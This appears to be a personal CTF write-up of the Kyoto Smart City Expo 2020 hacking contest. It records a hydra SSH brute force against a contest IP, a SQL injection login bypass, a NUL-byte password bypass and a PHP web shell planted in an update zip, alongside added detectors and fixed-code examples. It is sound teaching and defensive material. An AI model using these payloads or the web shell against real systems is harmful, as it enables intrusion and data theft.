kanyewest CTF

Notes on things I have been studying.

Hacking Contest in Kyoto Smart City Expo 2020: Write-up

0 decode(Very Easy)

$ echo -n 'RkxBR19reW90b3NtYXJ0Y2l0eWV4cG8=' | base64 -d
FLAG_kyotosmartcityexpo

1-1 FTP(Very Easy)

[screenshot]

1-2 SSH avoidance(Very Easy)

$ hydra -L user.txt -P password.txt 54.150.39.201 -s 52222 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-11 21:14:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 10000 login tries (l:100/p:100), ~625 tries per task
[DATA] attacking ssh://54.150.39.201:52222/
[52222][ssh] host: 54.150.39.201   login: admin   password: password
$ ssh admin@54.150.39.201 -p 52222
The authenticity of host '[54.150.39.201]:52222 ([54.150.39.201]:52222)' can't be established.
ECDSA key fingerprint is SHA256:K7NbGooE0P1B3L7BaC/or41slf4l+P8sfJSR71TtqIc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[54.150.39.201]:52222' (ECDSA) to the list of known hosts.
admin@54.150.39.201's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 5.4.0-1030-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.

To restore this content, you can run the 'unminimize' command.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

Last login: Sat Dec 12 02:09:52 2020 from 115.124.149.87
admin@58d2aec14ceb:~$ ls
flag.txt  q6
admin@58d2aec14ceb:~$ cat flag.txt 
FLAG_jbSSTdXTLCc4a
admin@58d2aec14ceb:~$
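What the hydra run above looks like from the other side is a burst of "Failed password" lines in the target's auth log from one source, followed by a single "Accepted password" from the same source. As an added example that is not part of the original write-up, here is a small detector over constructed sshd log lines: it flags a source IP once it has produced a threshold of failures inside a sliding window, and reports any successful login from an already-flagged IP as a probable compromised credential. The log lines, the threshold and the window are all my assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd log lines (not taken from the CTF box): a hydra-style spray
# from one source that ends in a successful guess, plus one unrelated user.
SAMPLE_LOG = """\
Dec 11 21:14:51 target sshd[2101]: Failed password for invalid user root from 203.0.113.7 port 51000 ssh2
Dec 11 21:14:51 target sshd[2102]: Failed password for invalid user test from 203.0.113.7 port 51001 ssh2
Dec 11 21:14:52 target sshd[2103]: Failed password for admin from 203.0.113.7 port 51002 ssh2
Dec 11 21:14:52 target sshd[2104]: Failed password for admin from 203.0.113.7 port 51003 ssh2
Dec 11 21:14:53 target sshd[2105]: Failed password for admin from 203.0.113.7 port 51004 ssh2
Dec 11 21:14:53 target sshd[2106]: Failed password for invalid user guest from 203.0.113.7 port 51005 ssh2
Dec 11 21:14:54 target sshd[2107]: Accepted password for admin from 203.0.113.7 port 51006 ssh2
Dec 11 21:20:00 target sshd[2200]: Failed password for alice from 198.51.100.9 port 40000 ssh2
Dec 11 21:25:00 target sshd[2201]: Accepted publickey for alice from 198.51.100.9 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>[\d.]+) port \d+ ssh2"
)

def parse_line(line):
    """Pull timestamp, outcome, auth method, user and source IP out of one sshd line."""
    m = LINE_RE.match(line)
    if not m:
        return None
    # syslog timestamps carry no year; deltas inside one log are still correct
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}

def detect_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return (sorted list of IPs flagged as brute forcing,
               list of (ip, user, method) logins that followed a flagged burst)."""
    recent = defaultdict(deque)   # ip -> timestamps of failures still inside the window
    flagged = set()
    suspicious_logins = []
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        q = recent[ev["ip"]]
        while q and ev["ts"] - q[0] > window:   # expire failures older than the window
            q.popleft()
        if ev["result"] == "Failed":
            q.append(ev["ts"])
            if len(q) >= threshold:
                flagged.add(ev["ip"])
        elif ev["result"] == "Accepted" and ev["ip"] in flagged:
            # a success right after a spray is the signal worth paging on
            suspicious_logins.append((ev["ip"], ev["user"], ev["method"]))
    return sorted(flagged), suspicious_logins

if __name__ == "__main__":
    print(detect_bruteforce(SAMPLE_LOG))
```

The hydra warning about reducing parallel tasks is the attacker's view of the same limit: sshd's MaxAuthTries caps attempts per connection, but it does nothing against many parallel connections, which is why a per-source counter like this (or fail2ban doing the same job) is the control that actually matters.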

2-1 basic authentication(Easy)

[screenshot]

6-1 exploration(Very Easy)

$ strings q6_backend_1.1
authUT
dmVyc2lvbjoxLjEsbmFtZTphZG1pbixwYXNzd29yZDpGTEFHX2UwclBGR0dlNkhha3Y=
contents.phpUT
"ip4h
{Y`SL

6yAx
Cj>Ks6
wIvS
t#Yt
authUT
contents.phpUT
$ echo -n 'dmVyc2lvbjoxLjEsbmFtZTphZG1pbixwYXNzd29yZDpGTEFHX2UwclBGR0dlNkhha3Y=' | base64 -d
version:1.1,name:admin,password:FLAG_e0rPFGGe6Hakv

7-1 hidden flag(Very Easy)

flag: FLAG_iZAPDhs3T2iYS

6-2 authentication avoidance(Easy)

username='+OR+1=1--&password=

[screenshot]

flag: FLAG_RqWGsVKFAQMUn
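The payload username='+OR+1=1--&password= works because the server pastes the form fields straight into its SQL statement. As an added example (my code, not the challenge's), here is the same login written both ways against an in-memory SQLite table, with the form body decoded exactly as the page sent it: the vulnerable version returns the first user for the injected body, the parameterised version does not. The table and the admin account are constructed for the demo.

```python
import sqlite3
from urllib.parse import parse_qs

# The exact POST body from the write-up. After form decoding ('+' -> space)
# the username field is: ' OR 1=1--
PAYLOAD = "username='+OR+1=1--&password="

def make_db():
    """Constructed users table with one account; not the challenge's data."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO users (username, password) VALUES ('admin', 'hunter2')")
    return conn

def form_fields(body):
    """Decode the POST body the way a web framework would."""
    f = parse_qs(body, keep_blank_values=True)
    return f.get("username", [""])[0], f.get("password", [""])[0]

def login_vulnerable(conn, body):
    user, pw = form_fields(body)
    # String concatenation: the attacker's quote closes the literal, OR 1=1 makes the
    # WHERE clause true for every row, and -- comments out the password check.
    sql = f"SELECT username FROM users WHERE username='{user}' AND password='{pw}'"
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_fixed(conn, body):
    user, pw = form_fields(body)
    # Bound parameters: the input is data and can never change the statement's structure.
    sql = "SELECT username FROM users WHERE username=? AND password=?"
    row = conn.execute(sql, (user, pw)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    print("vulnerable:", login_vulnerable(make_db(), PAYLOAD))
    print("fixed:     ", login_fixed(make_db(), PAYLOAD))
```

One caveat when reusing this payload elsewhere: SQLite and PostgreSQL accept a bare -- as a comment, while MySQL requires whitespace after it, which is why MySQL targets usually get --+ (the + decodes to a space) or # instead.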

4-1 breakthrough(Easy)

[screenshot]

There is a login screen that requires a password of at least 6 characters. Looking at the source code:

[screenshot]

The password is 1234, so padding out the missing characters with %00 gets you logged in.

username=user1&password=1234%00%00

[screenshot]

flag: FLAG_ajiofeijljkjsdklajie
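The bug behind this one is two checks that look at different views of the same input: the length check counts the raw 6 bytes of 1234%00%00, while the comparison stops at the first NUL and only sees 1234. The write-up does not show the backend, so the NUL-truncating comparison below is my assumption, modelled on a C strcmp-style compare; the code is an added example, not the challenge's. It decodes the exact form body from the page, reproduces the bypass, and then shows the check that closes it.

```python
import hmac
from urllib.parse import parse_qs

STORED_PASSWORD = b"1234"   # the 4-character secret the page's source view revealed
MIN_LEN = 6                 # the policy the login form enforces

def c_string(data: bytes) -> bytes:
    """Model of a NUL-terminated string: everything after the first 0x00 byte vanishes.
    Assumption: the write-up never shows the backend; this mimics a C strcmp-style compare."""
    return data.split(b"\x00", 1)[0]

def password_from_body(body: str) -> bytes:
    """Decode the POST body the way the server would; %00 becomes a real NUL byte."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get("password", [""])[0].encode("latin-1")

def login_vulnerable(body: str) -> str:
    pw = password_from_body(body)
    if len(pw) < MIN_LEN:                      # sees 6 bytes for "1234%00%00" and is satisfied
        return "too short"
    if c_string(pw) == STORED_PASSWORD:        # sees only "1234": the two checks disagree
        return "ok"
    return "bad password"

def login_fixed(body: str) -> str:
    pw = password_from_body(body)
    if any(b < 0x20 for b in pw):              # reject NUL and other control bytes up front
        return "invalid characters"
    if len(pw) < MIN_LEN:
        return "too short"
    if hmac.compare_digest(pw, STORED_PASSWORD):   # full-length, constant-time comparison
        return "ok"
    return "bad password"

if __name__ == "__main__":
    body = "username=user1&password=1234%00%00"
    print("vulnerable:", login_vulnerable(body))
    print("fixed:     ", login_fixed(body))
```

Note what the fixed version implies: with the control-byte filter in place the stored password 1234 can no longer satisfy its own policy, so the real remediation also means rotating that credential, not just patching the check.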

6-3 clairvoyance(Medium)

[screenshot]

It looks like uploading a suitably crafted update file should give arbitrary code execution.

Uploading an arbitrary file just gets the error "wrong ZIP format or password", so I build an exploitable file using the existing version 1.1 update file as a reference.

Add <?php echo shell_exec($_GET['p']);?> to the contents.php from 1.1.zip, zip it back up, and upload it.

$ zip -rm 1.2.zip auth contents.php
  adding: auth (stored 0%)
  adding: contents.php (deflated 43%)

I tried to read flag.php through the uploaded shell at http://18.177.208.49/tmp/72386217aab504b7e38ee7c28415f2e1a9717101982109dec8.php?p=cat%20flag.php, but:

[screenshot]

For a moment I panicked thinking I'd have to get root, but the source code had the FLAG in it.

[screenshot]

flag: FLAG_ZaKKC00Wn9nis

5-1 Discovery key(Easy)

I don't know much about apk files, so I just decoded it with apktool, and the FLAG was in AndroidManifest.xml.

<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" android:compileSdkVersion="30" android:compileSdkVersionCodename="11" package="com.example.getcoupon" platformBuildVersionCode="30" platformBuildVersionName="11">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <application android:allowBackup="true" android:appComponentFactory="androidx.core.app.CoreComponentFactory" android:debuggable="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:roundIcon="@mipmap/ic_launcher_round" android:supportsRtl="true" android:theme="@style/Theme.GetCoupon" android:usesCleartextTraffic="true">
        <meta-data android:name="com.google.android.maps.v2.API_KEY" android:value="FLAG_2NHxcrKRph73j"/>
        <activity android:name="com.example.getcoupon.GetCouponActivity"/>
        <activity android:name="com.example.getcoupon.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>
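The manifest gives away more than the flag: android:debuggable="true", android:usesCleartextTraffic="true" and android:allowBackup="true" are each a finding on their own, and an API key in meta-data ships in every copy of the APK. As an added example (mine, not from the write-up), here is a small audit over the decoded manifest above that flags those attributes and any meta-data value that looks like a credential; the attribute list and the secret-name pattern are my choices.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# The AndroidManifest.xml apktool produced for the challenge, copied from the write-up.
MANIFEST = """<?xml version="1.0" encoding="utf-8" standalone="no"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" android:compileSdkVersion="30" android:compileSdkVersionCodename="11" package="com.example.getcoupon" platformBuildVersionCode="30" platformBuildVersionName="11">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
    <application android:allowBackup="true" android:appComponentFactory="androidx.core.app.CoreComponentFactory" android:debuggable="true" android:icon="@mipmap/ic_launcher" android:label="@string/app_name" android:roundIcon="@mipmap/ic_launcher_round" android:supportsRtl="true" android:theme="@style/Theme.GetCoupon" android:usesCleartextTraffic="true">
        <meta-data android:name="com.google.android.maps.v2.API_KEY" android:value="FLAG_2NHxcrKRph73j"/>
        <activity android:name="com.example.getcoupon.GetCouponActivity"/>
        <activity android:name="com.example.getcoupon.MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
        </activity>
    </application>
</manifest>
"""

def android(attr):
    """ElementTree spells a namespaced attribute as {uri}name."""
    return "{%s}%s" % (ANDROID_NS, attr)

# <application> attributes that should not be true in a release build, with the reason.
RISKY_FLAGS = {
    "debuggable": "a debugger can be attached over adb; memory and traffic are readable",
    "usesCleartextTraffic": "plain HTTP is allowed, so tokens and credentials can be sniffed",
    "allowBackup": "app data can be pulled with 'adb backup' without root",
}
# Assumed pattern for names/values worth a second look.
SECRET_RE = re.compile(r"api[_-]?key|secret|token|password|flag", re.I)

def audit_manifest(xml_text):
    """Return (kind, subject, detail) findings for an apktool-decoded AndroidManifest.xml."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    findings = []
    if app is None:
        return findings
    for flag, why in RISKY_FLAGS.items():
        if app.get(android(flag)) == "true":
            findings.append(("flag", flag, why))
    for md in app.iter("meta-data"):
        name, value = md.get(android("name"), ""), md.get(android("value"), "")
        if SECRET_RE.search(name) or SECRET_RE.search(value):
            findings.append(("secret", name, value))
    return findings

if __name__ == "__main__":
    for finding in audit_manifest(MANIFEST):
        print(finding)
```

On a real engagement the same three flags are what you check first, because debuggable plus cleartext traffic means the app's network sessions can be read end to end on a device you control, and the embedded key is something the vendor has to rotate, not just remove from the next build.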